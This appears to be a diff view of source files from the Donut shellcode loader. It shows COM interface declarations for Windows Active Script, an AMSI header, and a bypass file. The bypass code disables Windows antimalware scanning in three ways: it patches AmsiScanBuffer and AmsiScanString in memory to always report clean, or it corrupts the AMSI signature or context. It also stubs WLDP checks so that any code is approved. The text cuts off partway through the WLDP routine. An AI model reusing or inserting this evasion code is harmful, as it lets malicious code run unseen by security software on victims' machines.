115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 ULONG m_cRef;
302 PDONUT_INSTANCE inst;
303 } ActiveScriptSiteWindow;
304
305 typedef struct _IActiveScriptErrorVtbl {
306 BEGIN_INTERFACE
307
308 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
309 IActiveScriptError * This,
310 /* [in] */ REFIID riid,
311 /* [annotation][iid_is][out] */
312 void **ppvObject);
313
314 ULONG ( STDMETHODCALLTYPE *AddRef )(
315 IActiveScriptError * This);
316
317 ULONG ( STDMETHODCALLTYPE *Release )(
318 IActiveScriptError * This);
319
320 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
321 IActiveScriptError * This,
322 /* [out] */ EXCEPINFO *pexcepinfo);
323
324 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
325 IActiveScriptError * This,
326 /* [out] */ DWORD *pdwSourceContext,
327 /* [out] */ ULONG *pulLineNumber,
328 /* [out] */ LONG *plCharacterPosition);
329
330 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
331 IActiveScriptError * This,
332 /* [out] */ BSTR *pbstrSourceLine);
333
334 END_INTERFACE
335 } IActiveScriptErrorVtbl;
336
337 typedef struct _IActiveScriptError {
338 IActiveScriptErrorVtbl *lpVtbl;
339 } ActiveScriptError;
340
341 typedef struct _IActiveScriptSiteVtbl {
342 BEGIN_INTERFACE
343
344 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
345 IActiveScriptSite * This,
346 /* [in] */ REFIID riid,
347 /* [annotation][iid_is][out] */
348 void **ppvObject);
349
350 ULONG ( STDMETHODCALLTYPE *AddRef )(
351 IActiveScriptSite * This);
352
353 ULONG ( STDMETHODCALLTYPE *Release )(
354 IActiveScriptSite * This);
355
356 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
357 IActiveScriptSite * This,
358 /* [out] */ LCID *plcid);
359
360 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
361 IActiveScriptSite * This,
362 /* [in] */ LPCOLESTR pstrName,
363 /* [in] */ DWORD dwReturnMask,
364 /* [out] */ IUnknown **ppiunkItem,
365 /* [out] */ ITypeInfo **ppti);
366
367 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
368 IActiveScriptSite * This,
369 /* [out] */ BSTR *pbstrVersion);
370
371 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
372 IActiveScriptSite * This,
373 /* [in] */ const VARIANT *pvarResult,
374 /* [in] */ const EXCEPINFO *pexcepinfo);
375
376 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
377 IActiveScriptSite * This,
378 /* [in] */ SCRIPTSTATE ssScriptState);
379
380 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
381 IActiveScriptSite * This,
382 /* [in] */ IActiveScriptError *pscripterror);
383
384 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
385 IActiveScriptSite * This);
386
387 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
388 IActiveScriptSite * This);
389
390 END_INTERFACE
391 } IActiveScriptSiteVtbl;
392
393 typedef struct _IActiveScriptSite {
394 IActiveScriptSiteVtbl *lpVtbl;
395 ULONG m_cRef;
396 } ActiveScriptSite;
397
398 #ifdef _WIN64
399 #define IActiveScriptParse IActiveScriptParse64
400 #define IID_IActiveScriptParse IID_IActiveScriptParse64
401 #else
402 #define IActiveScriptParse IActiveScriptParse32
403 #define IID_IActiveScriptParse IID_IActiveScriptParse32
404 #endif
405
406 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
407
408 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
409 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
410 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
411
412 // Informs the host that the scripting engine has begun executing the script code.
413 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
414
415 // Informs the host that the scripting engine has returned from executing script code.
416 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
417
418 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
419 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
420
421 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
422 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
423
424 // Informs the host that an execution error occurred while the engine was running the script.
425 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
426
427 // Informs the host that the scripting engine has changed states.
428 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
429
430 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
431 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
432
433 // Called when the script has completed execution.
434 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
435
436 // ################################################# IActiveScriptSiteWindow ###############################################
437 static VOID ActiveScriptSiteWindow_New(PDONUT_INSTANCE inst, IActiveScriptSiteWindow *this);
438
439 // IUnknown
440 static STDMETHODIMP ActiveScriptSiteWindow_QueryInterface(IActiveScriptSiteWindow *this, REFIID riid, void **ppv);
441 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_AddRef(IActiveScriptSiteWindow *this);
442 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_Release(IActiveScriptSiteWindow *this);
443
444 // IActiveScriptSiteWindow
445 static STDMETHODIMP ActiveScriptSiteWindow_GetWindow(IActiveScriptSiteWindow *iface, HWND *phwnd);
446 static STDMETHODIMP ActiveScriptSiteWindow_EnableModeless(IActiveScriptSiteWindow *iface, BOOL fEnable);
447
448 #endif
449
+182
-0
loader/amsi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef AMSI_H
32 #define AMSI_H
33
34 #include <windows.h>
35
36 DECLARE_HANDLE(HAMSICONTEXT);
37 DECLARE_HANDLE(HAMSISESSION);
38
39 typedef struct _IAmsiStream IAmsiStream;
40 typedef struct _IAntimalware IAntimalware;
41 typedef struct _IAntimalwareProvider IAntimalwareProvider;
42
43 typedef enum tagAMSI_RESULT {
44 // No detection found. Result likely not going to change after future definition update.
45 // a.k.a. known good
46 AMSI_RESULT_CLEAN = 0,
47 // No detection found. Result might change after future definition update.
48 AMSI_RESULT_NOT_DETECTED = 1,
49 // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
50 // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
51 // The large the result, the riskier to continue.
52 // Any return result equal to or larger than 32768 is consider malware and should be blocked.
53 // These values are provider specific, and may indicate malware family or ID.
54 // An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
55 AMSI_RESULT_DETECTED = 32768,
56 } AMSI_RESULT;
57
58 typedef enum tagAMSI_ATTRIBUTE {
59 // Name/version/GUID string of the calling application.
60 AMSI_ATTRIBUTE_APP_NAME = 0,
61 // LPWSTR, filename, URL, script unique id etc.
62 AMSI_ATTRIBUTE_CONTENT_NAME = 1,
63 // ULONGLONG, size of the input. Mandatory.
64 AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
65 // PVOID, memory address if content is fully loaded in memory. Mandatory unless
66 // Read() is implemented instead to support on-demand content retrieval.
67 AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
68 // PVOID, session is used to associate different scan calls, e.g. if the contents
69 // to be scanned belong to the sample original script. Return nullptr if content
70 // is self-contained. Mandatory.
71 AMSI_ATTRIBUTE_SESSION = 4,
72 } AMSI_ATTRIBUTE;
73
74 typedef struct IAmsiStreamVtbl {
75 BEGIN_INTERFACE
76
77 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
78 IAmsiStream * This,
79 REFIID riid,
80 void **ppvObject);
81
82 ULONG ( STDMETHODCALLTYPE *AddRef )(
83 IAmsiStream * This);
84
85 ULONG ( STDMETHODCALLTYPE *Release )(
86 IAmsiStream * This);
87
88 HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
89 IAmsiStream * This,
90 AMSI_ATTRIBUTE attribute,
91 ULONG dataSize,
92 unsigned char *data,
93 ULONG *retData);
94
95 HRESULT ( STDMETHODCALLTYPE *Read )(
96 IAmsiStream * This,
97 ULONGLONG position,
98 ULONG size,
99 unsigned char *buffer,
100 ULONG *readSize);
101
102 END_INTERFACE
103 } IAmsiStreamVtbl;
104
105 typedef struct _IAmsiStream {
106 IAmsiStreamVtbl *lpVtbl;
107 } AmsiStream;
108
109 typedef struct IAntimalwareProviderVtbl {
110 BEGIN_INTERFACE
111
112 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
113 IAntimalwareProvider * This,
114 REFIID riid,
115 void **ppvObject);
116
117 ULONG ( STDMETHODCALLTYPE *AddRef )(
118 IAntimalwareProvider * This);
119
120 ULONG ( STDMETHODCALLTYPE *Release )(
121 IAntimalwareProvider * This);
122
123 HRESULT ( STDMETHODCALLTYPE *Scan )(
124 IAntimalwareProvider * This,
125 IAmsiStream *stream,
126 AMSI_RESULT *result);
127
128 void ( STDMETHODCALLTYPE *CloseSession )(
129 IAntimalwareProvider * This,
130 ULONGLONG session);
131
132 HRESULT ( STDMETHODCALLTYPE *DisplayName )(
133 IAntimalwareProvider * This,
134 LPWSTR *displayName);
135
136 END_INTERFACE
137 } IAntimalwareProviderVtbl;
138
139 typedef struct _IAntimalwareProvider {
140 IAntimalwareProviderVtbl *lpVtbl;
141 } AntimalwareProvider;
142
143 typedef struct IAntimalwareVtbl {
144 BEGIN_INTERFACE
145
146 HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
147 IAntimalware *This,
148 REFIID riid,
149 void **ppvObject);
150
151 ULONG ( STDMETHODCALLTYPE *AddRef )(
152 IAntimalware * This);
153
154 ULONG ( STDMETHODCALLTYPE *Release )(
155 IAntimalware * This);
156
157 HRESULT ( STDMETHODCALLTYPE *Scan )(
158 IAntimalware * This,
159 IAmsiStream *stream,
160 AMSI_RESULT *result,
161 IAntimalwareProvider **provider);
162
163 void ( STDMETHODCALLTYPE *CloseSession )(
164 IAntimalware * This,
165 ULONGLONG session);
166
167 END_INTERFACE
168 } IAntimalwareVtbl;
169
170 typedef struct _IAntimalware {
171 IAntimalwareVtbl *lpVtbl;
172 } Antimalware;
173
174 typedef struct tagHAMSICONTEXT {
175 DWORD Signature; // "AMSI" or 0x49534D41
176 PWCHAR AppName; // set by AmsiInitialize
177 IAntimalware *Antimalware; // set by AmsiInitialize
178 DWORD SessionCount; // increased by AmsiOpenSession
179 } _HAMSICONTEXT, *_PHAMSICONTEXT;
180
181 #endif
+374
-0
loader/bypass.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 typedef enum _WLDP_HOST_ID {
32 WLDP_HOST_ID_UNKNOWN = 0,
33 WLDP_HOST_ID_GLOBAL = 1,
34 WLDP_HOST_ID_VBA = 2,
35 WLDP_HOST_ID_WSH = 3,
36 WLDP_HOST_ID_POWERSHELL = 4,
37 WLDP_HOST_ID_IE = 5,
38 WLDP_HOST_ID_MSI = 6,
39 WLDP_HOST_ID_MAX = 7
40 } WLDP_HOST_ID, *PWLDP_HOST_ID;
41
42 typedef struct _WLDP_HOST_INFORMATION {
43 DWORD dwRevision;
44 WLDP_HOST_ID dwHostId;
45 PCWSTR szSource;
46 HANDLE hSource;
47 } WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION;
48
49 #if defined(BYPASS_AMSI_A)
50
51 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
52 HRESULT WINAPI AmsiScanBufferStub(
53 HAMSICONTEXT amsiContext,
54 PVOID buffer,
55 ULONG length,
56 LPCWSTR contentName,
57 HAMSISESSION amsiSession,
58 AMSI_RESULT *result)
59 {
60 *result = AMSI_RESULT_CLEAN;
61 return S_OK;
62 }
63
64 // This function is never called. It's simply used to calculate
65 // the length of AmsiScanBufferStub above.
66 //
67 // The reason it performs a multiplication is because MSVC can identify
68 // functions that perform the same operation and eliminate them
69 // from the compiled code. Null subroutines are eliminated, so the body of
70 // function needs to do something.
71
72 int AmsiScanBufferStubEnd(int a, int b) {
73 return a * b;
74 }
75
76 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
77 HRESULT WINAPI AmsiScanStringStub(
78 HAMSICONTEXT amsiContext,
79 LPCWSTR string,
80 LPCWSTR contentName,
81 HAMSISESSION amsiSession,
82 AMSI_RESULT *result)
83 {
84 *result = AMSI_RESULT_CLEAN;
85 return S_OK;
86 }
87
88 int AmsiScanStringStubEnd(int a, int b) {
89 return a + b;
90 }
91
92 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
93 HMODULE dll;
94 DWORD len, op, t;
95 LPVOID cs;
96
97 // try load amsi. if unable, assume DLL doesn't exist
98 // and return TRUE to indicate it's okay to continue
99 dll = inst->api.LoadLibraryA(inst->amsi);
100 if(dll == NULL) return TRUE;
101
102 // resolve address of AmsiScanBuffer. if not found,
103 // return FALSE because it should exist ...
104 cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf);
105 if(cs == NULL) return FALSE;
106
107 // calculate length of stub
108 len = (ULONG_PTR)AmsiScanBufferStubEnd -
109 (ULONG_PTR)AmsiScanBufferStub;
110
111 DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
112
113 // check for negative length. this would only happen when
114 // compiler decides to re-order functions.
115 if((int)len < 0) return FALSE;
116
117 // make the memory writeable. return FALSE on error
118 if(!inst->api.VirtualProtect(
119 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
120
121 DPRINT("Overwriting AmsiScanBuffer");
122 // over write with virtual address of stub
123 Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
124 // set memory back to original protection
125 inst->api.VirtualProtect(cs, len, op, &t);
126
127 // resolve address of AmsiScanString. if not found,
128 // return FALSE because it should exist ...
129 cs = inst->api.GetProcAddress(dll, inst->amsiScanStr);
130 if(cs == NULL) return FALSE;
131
132 // calculate length of stub
133 len = (ULONG_PTR)AmsiScanStringStubEnd -
134 (ULONG_PTR)AmsiScanStringStub;
135
136 DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
137
138 // check for negative length. this would only happen when
139 // compiler decides to re-order functions.
140 if((int)len < 0) return FALSE;
141
142 // make the memory writeable
143 if(!inst->api.VirtualProtect(
144 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
145
146 DPRINT("Overwriting AmsiScanString");
147 // over write with virtual address of stub
148 Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
149 // set memory back to original protection
150 inst->api.VirtualProtect(cs, len, op, &t);
151
152 return TRUE;
153 }
154
155 #elif defined(BYPASS_AMSI_B)
156
157 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
158 HMODULE dll;
159 PBYTE cs;
160 DWORD i, op, t;
161 BOOL disabled = FALSE;
162 PDWORD Signature;
163
164 // try load amsi. if unable to load, assume
165 // it doesn't exist and return TRUE to indicate
166 // it's okay to continue.
167 dll = inst->api.LoadLibraryA(inst->amsi);
168 if(dll == NULL) return TRUE;
169
170 // resolve address of AmsiScanBuffer. if unable, return
171 // FALSE because it should exist.
172 cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf);
173 if(cs == NULL) return FALSE;
174
175 // scan for signature
176 for(i=0;;i++) {
177 Signature = (PDWORD)&cs[i];
178 // is it "AMSI"?
179 if(*Signature == *(PDWORD)inst->amsi) {
180 // set memory protection for write access
181 inst->api.VirtualProtect(cs, sizeof(DWORD),
182 PAGE_EXECUTE_READWRITE, &op);
183
184 // change signature
185 *Signature++;
186
187 // set memory back to original protection
188 inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);
189 disabled = TRUE;
190 break;
191 }
192 }
193 return disabled;
194 }
195
196 #elif defined(BYPASS_AMSI_C)
197
198 // Attempt to find AMSI context in .data section of CLR.dll
199 // Could also scan PEB.ProcessHeap for this..
200 // Disabling AMSI via AMSI context is based on idea by Matt Graeber
201 // https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
202
203 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
204 LPVOID clr;
205 BOOL disabled = FALSE;
206 PIMAGE_DOS_HEADER dos;
207 PIMAGE_NT_HEADERS nt;
208 PIMAGE_SECTION_HEADER sh;
209 DWORD i, j, res;
210 PBYTE ds;
211 MEMORY_BASIC_INFORMATION mbi;
212 _PHAMSICONTEXT ctx;
213
214 // get address of CLR.dll. if unable, this
215 // probably isn't a dotnet assembly being loaded
216 clr = inst->api.GetModuleHandleA(inst->clr);
217 if(clr == NULL) return FALSE;
218
219 dos = (PIMAGE_DOS_HEADER)clr;
220 nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
221 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
222 nt->FileHeader.SizeOfOptionalHeader);
223
224 // scan all writeable segments while disabled == FALSE
225 for(i = 0;
226 i < nt->FileHeader.NumberOfSections && !disabled;
227 i++)
228 {
229 // if this section is writeable, assume it's data
230 if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
231 // scan section for pointers to the heap
232 ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
233
234 for(j = 0;
235 j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
236 j += sizeof(ULONG_PTR))
237 {
238 // get pointer
239 ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
240 // query if the pointer
241 res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
242 if(res != sizeof(mbi)) continue;
243
244 // if it's a pointer to heap or stack
245 if ((mbi.State == MEM_COMMIT ) &&
246 (mbi.Type == MEM_PRIVATE ) &&
247 (mbi.Protect == PAGE_READWRITE))
248 {
249 ctx = (_PHAMSICONTEXT)ptr;
250 // check if it contains the signature
251 if(ctx->Signature == *(PDWORD*)inst->amsi) {
252 // corrupt it
253 ctx->Signature++;
254 disabled = TRUE;
255 break;
256 }
257 }
258 }
259 }
260 }
261 return disabled;
262 }
263
264 #elif defined(BYPASS_AMSI_D)
265 // This is where you may define your own AMSI bypass.
266 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_C defined.
267
268 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
269
270 }
271
272 #endif
273
274 #if defined(BYPASS_WLDP_A)
275
276 // fake function that always returns S_OK and isApproved = TRUE
277 HRESULT WINAPI WldpIsClassInApprovedListStub(
278 REFCLSID classID,
279 PWLDP_HOST_INFORMATION hostInformation,
280 PBOOL isApproved,
281 DWORD optionalFlags)
282 {
283 *isApproved = TRUE;
284 return S_OK;
285 }
286
287 // make sure prototype and code are different from other subroutines
288 // to avoid removal by MSVC
289 int WldpIsClassInApprovedListStubEnd(int a, int b) {
290 return a - b;
291 }
292
293 // fake function that always returns S_OK
294 HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
295 HANDLE fileHandle,
296 PVOID baseImage,
297 ULONG ImageSize)
298 {
299 return S_OK;
300 }
301
302 int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
303 return a / b;
304 }
305
306 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
307 HMODULE wldp;
308 DWORD len, op, t;
309 LPVOID cs;
310
311 // try load wldp. if unable, assume DLL doesn't exist
312 // and return TRUE to indicate it's okay to continue
313 wldp = inst->api.LoadLibraryA(inst->wldp);
314 if(wldp == NULL) return TRUE;
315
316 // resolve address of WldpQueryDynamicCodeTrust
317 // if not found, return FALSE because it should exist
